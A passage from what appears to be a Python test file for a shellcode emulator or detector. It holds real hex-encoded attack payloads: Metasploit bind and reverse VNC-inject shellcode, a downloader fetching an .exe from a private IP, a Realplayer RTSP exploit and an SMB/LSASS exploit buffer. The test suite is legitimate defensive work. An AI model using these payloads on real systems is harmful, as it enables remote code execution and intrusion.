..http:/" 710 | shellcode += b"\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x34\x2e\x34\x36\x3a\x35" # 0x00f0 /192.168 .14.46:5" 711 | shellcode += b"\x35\x30\x33\x38\x2f\x6d\x64\x6e\x65\x78\x2e\x65\x78\x65\x00\x00" # 0x0100 5038/mdn ex.exe.." 712 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0110 ........ ........" 713 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0120 ........ ........" 714 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0130 ........ ........" 715 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0140 ........ ........" 716 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0150 ........ ........" 717 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0160 ........ ........" 718 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0170 ........ ........" 719 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0180 ........ ........" 
720 | 721 | self.runShellcode(shellcode, 16) 722 | 723 | def testShellcode17(self): 724 | """ 725 | win32_bind pex & ./clet -S win32_bind_pex -b 50 -t -B -c -f ../spectrum/stat2 -a -n 123 726 | """ 727 | 728 | shellcode = b"\x56\x4F\x4C\x41\x54\x49\x4C\x49\x54\x49\x45\x53\x52\x45\x43\x45" 729 | shellcode += b"\x44\x45\x44\x42\x45\x4C\x4C\x4D\x41\x4E\x54\x52\x41\x44\x49\x54" 730 | shellcode += b"\x49\x4F\x4E\x53\x45\x58\x41\x4D\x49\x4E\x45\x44\x55\x50\x52\x4F" 731 | shellcode += b"\x4F\x54\x53\x50\x41\x52\x4C\x4F\x52\x53\x45\x58\x43\x45\x4C\x4C" 732 | shellcode += b"\x45\x4E\x43\x45\x4C\x41\x42\x53\x44\x45\x45\x50\x45\x4E\x53\x52" 733 | shellcode += b"\x41\x44\x49\x41\x4E\x54\x46\x52\x45\x53\x48\x57\x41\x54\x45\x52" 734 | shellcode += b"\x53\x55\x53\x50\x45\x43\x54\x49\x4E\x47\x42\x52\x4F\x49\x4C\x53" 735 | shellcode += b"\x42\x41\x44\x47\x45\x52\x49\x4E\x47\x4D\x41\xEB\x32\x59\x31\xC0" 736 | shellcode += b"\xB0\x5C\x8B\x11\x81\xEA\xC1\x58\x63\x43\x81\xC2\x8D\xED\x76\x39" 737 | shellcode += b"\x81\xF2\x74\x22\x74\x71\xC1\xC2\x0F\xC1\xC2\x15\x89\x11\x81\xE9" 738 | shellcode += b"\xFE\xFF\xFF\xFF\x41\x41\x2C\x01\x48\x48\x48\x74\x07\xEB\xD3\xE8" 739 | shellcode += b"\xC9\xFF\xFF\xFF\x1B\x8A\xD8\x59\x33\x48\x78\x88\xBF\x98\x84\x8E" 740 | shellcode += b"\x50\x30\xF1\x6E\xF9\x8B\x34\x53\xEE\x78\x26\xA8\x23\x91\x94\xD3" 741 | shellcode += b"\x12\xD8\x75\x8C\x83\x90\xAA\x05\x36\x8C\x1A\x53\x27\xC7\x0D\xD7" 742 | shellcode += b"\x8B\xCE\xB4\x8F\xF8\x8D\x7A\x02\x86\x8E\xD4\x13\x3C\x8B\x5A\xC7" 743 | shellcode += b"\x92\xFB\xD6\xEE\x3E\x06\x27\xD4\x84\xAA\x96\x87\x94\x9A\x24\x1C" 744 | shellcode += b"\x37\x41\xE1\xC9\x4B\x98\x7A\x62\x86\x8E\x04\x55\xBC\x8E\xAE\xBF" 745 | shellcode += b"\xB9\xED\xB2\xFD\xB4\x8C\xDA\x3F\x3A\xBC\x53\xD5\x90\x8B\x27\x45" 746 | shellcode += b"\xAC\x02\xB2\xBF\xB8\x8E\x6A\x14\xC5\x94\x6A\xD3\xD4\x81\x7C\x8F" 747 | shellcode += b"\xD8\xBE\x64\xF2\x63\x69\x2D\x02\xFA\x10\x42\x78\x6A\x0F\x3E\x98" 748 | shellcode += 
b"\x39\xD1\x65\xFA\x2A\xBB\xA4\x8C\x77\xD1\x05\xBA\x09\x37\x05\x05" 749 | shellcode += b"\xCC\x88\x42\x27\x19\x21\x73\x5C\x01\x71\xD7\x17\xD3\x54\x70\x5C" 750 | shellcode += b"\xB1\x11\x30\x72\xA9\x11\x2F\x42\xA8\xD1\x65\x3A\xFA\xF0\xA3\x72" 751 | shellcode += b"\xAA\x71\x5A\x6D\xFD\x40\xC9\x66\x6B\x5A\x70\x0C\x21\x01\x54\x72" 752 | shellcode += b"\xE9\x07\xE8\x65\xCE\xE4\xD0\x4D\xE9\x67\x38\x82\xE9\x07\xE8\x65" 753 | shellcode += b"\x12\x63\xDB\x63\xE9\x67\x68\x82\x39\x31\x70\x4C\xB1\x85\xEC\x0C" 754 | shellcode += b"\x5B\x7A\xED\xA1\x63\x39\x70\xFC\x61\xA0\x1C\x15\xFA\x10\x8D\x75" 755 | shellcode += b"\x4C\xA8\x5C\xA2\x09\xBD\xD6\x9F\x22\x41\xCF\x7F\x92\xFB\x36\x2C" 756 | shellcode += b"\xDE\x27\x8F\xB9\xA3\xC2\x30\xEE\x1C\x80\xB1\xE1\x2E\x85\x3C\xC4" 757 | shellcode += b"\xB3\x63\x74\xEC\x3B\xD2\x05\x5A\x69\x21\x50\xC2\x89\xA1\x4C\x27" 758 | shellcode += b"\x89\x31\x50\x22\x83\x89\x8C\x01\x51\xDE\x36\xA2\x63\xA9\x6C\xFC" 759 | shellcode += b"\x73\xCB\x65\xFA\x6C\xC1\x35\xBF\x40\xD0\x05\x4A\xE9\x07\xE8\x35" 760 | shellcode += b"\x23\x47\x73\x12\xE9\x67\x78\x3C\x81\xFE\x62\x17\xAF\x96\x69\x92" 761 | shellcode += b"\x43\x42\x42\x41\x42\x43\x43\x43\x41\x41\x42\x42\x42\x43\x41\x43" 762 | shellcode += b"\x43\x41\x43\x41\x42\x43\x41\x41\x43\x41\x43\x42\x43\x41\x41\x43" 763 | shellcode += b"\x43\x43\x43\x41\x41\x42\x43\x41\x41\x43\x43\x41\x43\x43\x43\x43" 764 | shellcode += b"\x43\x43\x03\x43" 765 | 766 | self.runShellcode(shellcode, 17) 767 | 768 | def testShellcode18(self): 769 | """ 770 | clet decoded nop slide (144 0x90 decoded with ./clet -S 144nop -b 50 -t -B -c -f ../spectrum/stat2 -a -n 123) 771 | """ 772 | 773 | shellcode = b"\x43\x41\x50\x53\x50\x45\x43\x49\x41\x4C\x49\x53\x54\x53\x41\x43" 774 | shellcode += b"\x43\x45\x53\x53\x49\x4E\x47\x41\x4D\x42\x4C\x45\x44\x41\x4D\x45" 775 | shellcode += b"\x52\x49\x43\x41\x52\x45\x55\x4E\x49\x54\x45\x44\x57\x41\x52\x52" 776 | shellcode += b"\x41\x4E\x54\x59\x53\x4C\x41\x50\x53\x54\x49\x43\x4B\x43\x52\x59" 777 | 
shellcode += b"\x50\x54\x4F\x47\x52\x41\x50\x48\x49\x43\x41\x4C\x4C\x59\x41\x44" 778 | shellcode += b"\x56\x49\x43\x45\x45\x4E\x4A\x4F\x49\x4E\x53\x47\x4C\x4F\x52\x49" 779 | shellcode += b"\x46\x49\x43\x41\x54\x49\x4F\x4E\x50\x48\x4F\x45\x4E\x49\x58\x41" 780 | shellcode += b"\x48\x4D\x45\x44\x41\x42\x41\x44\x50\x52\x4F\xEB\x2E\x58\x31\xDB" 781 | shellcode += b"\xB3\x64\x8B\x08\xC1\xC1\x07\x81\xF1\x64\x9A\xAA\x3B\x81\xC1\xC4" 782 | shellcode += b"\x73\xD8\x66\xC1\xC1\x0A\x81\xC1\x31\x85\xF2\x3B\x89\x08\x40\x40" 783 | shellcode += b"\x40\x40\x80\xEB\x02\x4B\x4B\x74\x07\xEB\xD7\xE8\xCD\xFF\xFF\xFF" 784 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 785 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 786 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 787 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 788 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 789 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 790 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 791 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 792 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 793 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 794 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 795 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 796 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 797 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 798 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 799 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 800 
| shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 801 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 802 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 803 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 804 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 805 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 806 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 807 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 808 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 809 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 810 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 811 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 812 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 813 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 814 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 815 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 816 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 817 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 818 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 819 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 820 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 821 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 822 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 
823 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 824 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 825 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 826 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 827 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 828 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 829 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 830 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 831 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 832 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 833 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 834 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 835 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 836 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 837 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 838 | shellcode += b"\x53\x2C\x6E\xB5\x43\x42\x41\x43\x43\x43\x42\x41\x41\x42\x43\x41" 839 | shellcode += b"\x41\x0A\x43\x43\x41\x41\x41\x43\x43\x42\x42\x43\x43\x41\x42\x41" 840 | shellcode += b"\x43\x42\x43\x0A\x42\x43\x41\x41\x43\x41\x42\x43\x43\x41\x43\x43" 841 | shellcode += b"\x42\x43\x41\x0A\x43\x41\x43\x43" 842 | 843 | self.runShellcode(shellcode, 18) 844 | 845 | def testShellcode19(self): 846 | """ 847 | The Hackers Choice Realplayer 8 exploi 848 | """ 849 | 850 | shellcode = b"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" # 0x0000 ../../.. /../../." 851 | shellcode += b"\x2e\x2f\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" # 0x0010 ./+..... 
..t$.[.s" 852 | shellcode += b"\x13\x9a\xaa\xe4\x36\x83\xeb\xfc\xe2\xf4\x66\xc0\x0f\x7b\x72\x53" # 0x0020 ....6... ..f..{rS" 853 | shellcode += b"\x1b\xc9\x65\xca\x6f\x5a\xbe\x8e\x6f\x73\xa6\x21\x98\x33\xe2\xab" # 0x0030 ..e.oZ.. os.!.3.." 854 | shellcode += b"\x0b\xbd\xd5\xb2\x6f\x69\xba\xab\x0f\x7f\x11\x9e\x6f\x37\x74\x9b" # 0x0040 ....oi.. ....o7t." 855 | shellcode += b"\x24\xaf\x36\x2e\x24\x42\x9d\x6b\x2e\x3b\x9b\x68\x0f\xc2\xa1\xfe" # 0x0050 $.6.$B.k .;.h...." 856 | shellcode += b"\xc0\x1e\xef\x4f\x6f\x69\xbe\xab\x0f\x50\x11\xa6\xaf\xbd\xc5\xb6" # 0x0060 ...Ooi.. .P......" 857 | shellcode += b"\xe5\xdd\x99\x86\x6f\xbf\xf6\x8e\xf8\x57\x59\x9b\x3f\x52\x11\xe9" # 0x0070 ....o... .WY.?R.." 858 | shellcode += b"\xd4\xbd\xda\xa6\x6f\x46\x86\x07\x6f\x76\x92\xf4\x8c\xb8\xd4\xa4" # 0x0080 ....oF.. ov......" 859 | shellcode += b"\x08\x66\x65\x7c\x82\x65\xfc\xc2\xd7\x04\xf2\xdd\x97\x04\xc5\xfe" # 0x0090 .fe|.e.. ........" 860 | shellcode += b"\x1b\xe6\xf2\x61\x09\xca\xa1\xfa\x1b\xe0\xc5\x23\x01\x50\x1b\x47" # 0x00a0 ...a.... ...#.P.G" 861 | shellcode += b"\xec\x34\xcf\xc0\xe6\xc9\x4a\xc2\x3d\x3f\x6f\x07\xb3\xc9\x4c\xf9" # 0x00b0 .4....J. =?o...L." 862 | shellcode += b"\xb7\x65\xc9\xf9\xa7\x65\xd9\xf9\x1b\xe6\xfc\xc2\xfc\x98\xfc\xf9" # 0x00c0 .e...e.. ........" 863 | shellcode += b"\x6d\xd7\x0f\xc2\x40\x2c\xea\x6d\xb3\xc9\x4c\xc0\xf4\x67\xcf\x55" # 0x00d0 m...@,.m ..L..g.U" 864 | shellcode += b"\x34\x5e\x3e\x07\xca\xdf\xcd\x55\x32\x65\xcf\x55\x34\x5e\x7f\xe3" # 0x00e0 4^>....U 2e.U4^.." 865 | shellcode += b"\x62\x7f\xcd\x55\x32\x66\xce\xfe\xb1\xc9\x4a\x39\x8c\xd1\xe3\x6c" # 0x00f0 b..U2f.. ..J9...l" 866 | shellcode += b"\x9d\x61\x65\x7c\xb1\xc9\x4a\xcc\x8e\x52\xfc\xc2\x87\x5b\x13\x4f" # 0x0100 .ae|..J. .R...[.O" 867 | shellcode += b"\x8e\x66\xc3\x83\x28\xbf\x7d\xc0\xa0\xbf\x78\x9b\x24\xc5\x30\x54" # 0x0110 .f..(.}. ..x.$.0T" 868 | shellcode += b"\xa6\x1b\x64\xe8\xc8\xa5\x17\xd0\xdc\x9d\x31\x01\x8c\x44\x64\x19" # 0x0120 ..d..... ..1..Dd." 
869 | shellcode += b"\xf2\xc9\xef\xee\x1b\xe0\xc1\xfd\xb6\x67\xcb\xfb\x8e\x37\xcb\xfb" # 0x0130 ........ .g...7.." 870 | shellcode += b"\xb1\x67\x65\x7a\x8c\x9b\x43\xaf\x2a\x65\x65\x7c\x8e\xc9\x65\x9d" # 0x0140 .gez..C. *ee|..e." 871 | shellcode += b"\x1b\xe6\x11\xfd\x18\xb5\x5e\xce\x1b\xe0\xc8\x55\x34\x5e\x75\x64" # 0x0150 ......^. ...U4^ud" 872 | shellcode += b"\x04\x56\xc9\x55\x32\xc9\x4a\xaa\xe4\x36\x2e\x73\x6d\x69\x20\x52" # 0x0160 .V.U2.J. .6.smi R" 873 | shellcode += b"\x54\x53\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x44\x45\x53\x43\x52" # 0x0170 TSP/1.0. ...DESCR" 874 | shellcode += b"\x49\x42\x45\x20\x72\x74\x73\x70\x3a\x2f\x2f\x32\x31\x37\x2e\x31" # 0x0180 IBE rtsp ://217.1" 875 | shellcode += b"\x36\x30\x2e\x32\x32\x33\x2e\x37\x34\x3a\x35\x35\x34\x2f\x61\x73" # 0x0190 60.223.7 4:554/as" 876 | shellcode += b"\x64\x66\x2e\x6d\x70\x33\x20\x52\x54\x53\x50\x2f\x31\x2e\x30\x0d" # 0x01a0 df.mp3 R TSP/1.0." 877 | shellcode += b"\x0a\x44\x45\x53\x43\x52\x49\x42\x45\x20\x2f\x26\x21\x40\x2e\x25" # 0x01b0 .DESCRIB E /&!@.%" 878 | shellcode += b"\x5e\x25\x2e\x73\x6d\x69\x20\x52\x54\x53\x50\x2f\x31\x2e\x33\x2e" # 0x01c0 ^%.smi R TSP/1.3." 879 | shellcode += b"\x33\x2e\x37\x0d\x0a\x0d\x0a\x44\x45\x53\x43\x52\x49\x42\x45\x20" # 0x01d0 3.7....D ESCRIBE " 880 | shellcode += b"\x2f\x20\x2e\x73\x6d\x69\x20\x52\x54\x53\x50\x2f\x31\x2e\x30\x0d" # 0x01e0 / .smi R TSP/1.0." 881 | shellcode += b"\x0a\x0d\x0a\x20\x52\x54\x53\x50\x2f\x31\x2e\x30\x0d\x0a\x54\x72" # 0x01f0 ... RTSP /1.0..Tr" 882 | shellcode += b"\x61\x6e\x73\x70\x6f\x72\x74\x3a\x20\x54\x48\x43\x72\x30\x78\x21" # 0x0200 ansport: THCr0x!" 
883 | 884 | self.runShellcode(shellcode, 19) 885 | 886 | def testShellcode20(self): 887 | """ 888 | win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh 889 | AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=287 Encoder=None http://metasploit.com 890 | """ 891 | 892 | shellcode = b"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" 893 | shellcode += b"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" 894 | shellcode += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" 895 | shellcode += b"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" 896 | shellcode += b"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" 897 | shellcode += b"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" 898 | shellcode += b"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" 899 | shellcode += b"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53" 900 | shellcode += b"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4" 901 | shellcode += b"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9" 902 | shellcode += b"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d" 903 | shellcode += b"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51" 904 | shellcode += b"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54" 905 | shellcode += b"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff" 906 | shellcode += b"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0\x6a" 907 | shellcode += b"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55" 908 | shellcode += b"\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10" 909 | shellcode += b"\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3" 910 | 911 | self.runShellcode(shellcode, 20) 912 | 913 | def testShellcode21(self): 914 | """ 915 | windows/vncinject/reverse_tcp - 177 bytes (stage 
1) http://www.metasploit.com DisableCourtesyShell=false, 916 | VNCHOST=127.0.0.1, VNCPORT=5900, EXITFUNC=seh, DLL=/tmp/framework-3.0/data/vncdll.dll, 917 | LPORT=4444, LHOST=192.168.53.20, AUTOVNC=true 918 | """ 919 | 920 | shellcode = b"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d" 921 | shellcode += b"\x3c\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34" 922 | shellcode += b"\x9a\x01\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0" 923 | shellcode += b"\x75\xf6\x43\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9" 924 | shellcode += b"\x66\x8b\x1c\x59\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c" 925 | shellcode += b"\x24\x1c\x61\xff\xe0\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" 926 | shellcode += b"\x8b\x70\x1c\xad\x8b\x68\x08\x5e\x66\x53\x66\x68\x33\x32" 927 | shellcode += b"\x68\x77\x73\x32\x5f\x54\x66\xb9\x72\x60\xff\xd6\x95\x53" 928 | shellcode += b"\x53\x53\x53\x43\x53\x43\x53\x89\xe7\x66\x81\xef\x08\x02" 929 | shellcode += b"\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66\xb9\xa8\x6f\xff\xd6" 930 | shellcode += b"\x97\x68\xc0\xa8\x35\x14\x66\x68\x11\x5c\x66\x53\x89\xe3" 931 | shellcode += b"\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50\xb4\x0c\x50" 932 | shellcode += b"\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6" 933 | 934 | self.runShellcode(shellcode, 21) 935 | 936 | def testShellcode22(self): 937 | """ 938 | Till sein lsass dump 939 | """ 940 | 941 | shellcode = b"\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8" 942 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x37\x13" 943 | shellcode += b"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f" 944 | shellcode += b"\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02" 945 | shellcode += b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f" 946 | shellcode += b"\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70" 947 | shellcode += b"\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30" 948 | shellcode += 
b"\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54" 949 | shellcode += b"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00\x00\x00\x10\xbf\xff\x53\x4d" 950 | shellcode += b"\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00" 951 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x37\x13\x00\x00\x00\x00\x0c\xff\x00" 952 | shellcode += b"\x00\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00\x7e\x10\x00\x00" 953 | shellcode += b"\x00\x00\xd4\x00\x00\x80\x7e\x10\x60\x82\x10\x7a\x06\x06\x2b\x06" 954 | shellcode += b"\x01\x05\x05\x02\xa0\x82\x10\x6e\x30\x82\x10\x6a\xa1\x82\x10\x66" 955 | shellcode += b"\x23\x82\x10\x62\x03\x82\x04\x01\x00\x41\x41\x41\x41\x41\x41\x41" 956 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 957 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 958 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 959 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 960 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 961 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 962 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 963 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 964 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 965 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 966 | shellcode += 